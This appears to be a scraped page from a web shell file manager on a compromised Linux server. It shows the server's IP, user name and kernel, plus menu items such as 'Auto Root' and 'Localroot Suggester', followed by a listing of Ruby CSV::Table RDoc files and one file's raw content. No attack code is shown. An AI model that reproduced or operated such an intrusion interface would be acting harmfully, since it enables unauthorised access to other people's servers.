Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
CSV /
Table /
Delete
Unzip
Name
Size
Permission
Date
Action
%3c%3c-i.ri
866
B
-rw-r--r--
2026-04-07 17:22
%3d%3d-i.ri
1007
B
-rw-r--r--
2026-04-07 17:22
%5b%5d%3d-i.ri
5.79
KB
-rw-r--r--
2026-04-07 17:22
%5b%5d-i.ri
7.21
KB
-rw-r--r--
2026-04-07 17:22
by_col%21-i.ri
707
B
-rw-r--r--
2026-04-07 17:22
by_col-i.ri
979
B
-rw-r--r--
2026-04-07 17:22
by_col_or_row%21-i.ri
740
B
-rw-r--r--
2026-04-07 17:22
by_col_or_row-i.ri
1019
B
-rw-r--r--
2026-04-07 17:22
by_row%21-i.ri
698
B
-rw-r--r--
2026-04-07 17:22
by_row-i.ri
965
B
-rw-r--r--
2026-04-07 17:22
cdesc-Table.ri
6.68
KB
-rw-r--r--
2026-04-07 17:22
delete-i.ri
1.75
KB
-rw-r--r--
2026-04-07 17:22
delete_if-i.ri
1.65
KB
-rw-r--r--
2026-04-07 17:22
dig-i.ri
464
B
-rw-r--r--
2026-04-07 17:22
each-i.ri
1.48
KB
-rw-r--r--
2026-04-07 17:22
headers-i.ri
1.02
KB
-rw-r--r--
2026-04-07 17:22
inspect-i.ri
945
B
-rw-r--r--
2026-04-07 17:22
mode-i.ri
311
B
-rw-r--r--
2026-04-07 17:22
new-c.ri
2.33
KB
-rw-r--r--
2026-04-07 17:22
push-i.ri
848
B
-rw-r--r--
2026-04-07 17:22
table-i.ri
308
B
-rw-r--r--
2026-04-07 17:22
to_a-i.ri
610
B
-rw-r--r--
2026-04-07 17:22
to_csv-i.ri
1.15
KB
-rw-r--r--
2026-04-07 17:22
to_s-i.ri
303
B
-rw-r--r--
2026-04-07 17:22
values_at-i.ri
2.21
KB
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI" each:ETI"CSV::Table#each;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"=Calls the block with each row or column; returns +self+.;To:RDoc::Markup::BlankLine o; ; [I"DWhen the access mode is <tt>:row</tt> or <tt>:col_or_row</tt>, ;TI"0calls the block with each \CSV::Row object:;To:RDoc::Markup::Verbatim; [ I"2source = "Name,Value\nfoo,0\nbar,1\nbaz,2\n" ;TI".table = CSV.parse(source, headers: true) ;TI";table.by_row! # => #<CSV::Table mode:row row_count:4> ;TI"table.each {|row| p row } ;T:@format0o; ; [I"Output:;To;; [I"*#<CSV::Row "Name":"foo" "Value":"0"> ;TI"*#<CSV::Row "Name":"bar" "Value":"1"> ;TI"*#<CSV::Row "Name":"baz" "Value":"2"> ;T; 0o; ; [I",When the access mode is <tt>:col</tt>, ;TI";calls the block with each column as a 2-element array ;TI":containing the header and an \Array of column fields:;To;; [I";table.by_col! # => #<CSV::Table mode:col row_count:4> ;TI"/table.each {|column_data| p column_data } ;T; 0o; ; [I"Output:;To;; [I"%["Name", ["foo", "bar", "baz"]] ;TI" ["Value", ["0", "1", "2"]] ;T; 0o; ; [I"4Returns a new \Enumerator if no block is given:;To;; [I"Ktable.each # => #<Enumerator: #<CSV::Table mode:col row_count:4>:each>;T; 0: @fileI"lib/csv/table.rb;T:0@omit_headings_from_table_of_contents_below0I"/table.each {|row_or_column| ... ) -> self ;TI"header, map {|row| row};T[ I" (&block);T@7FI" Table;TcRDoc::NormalClass00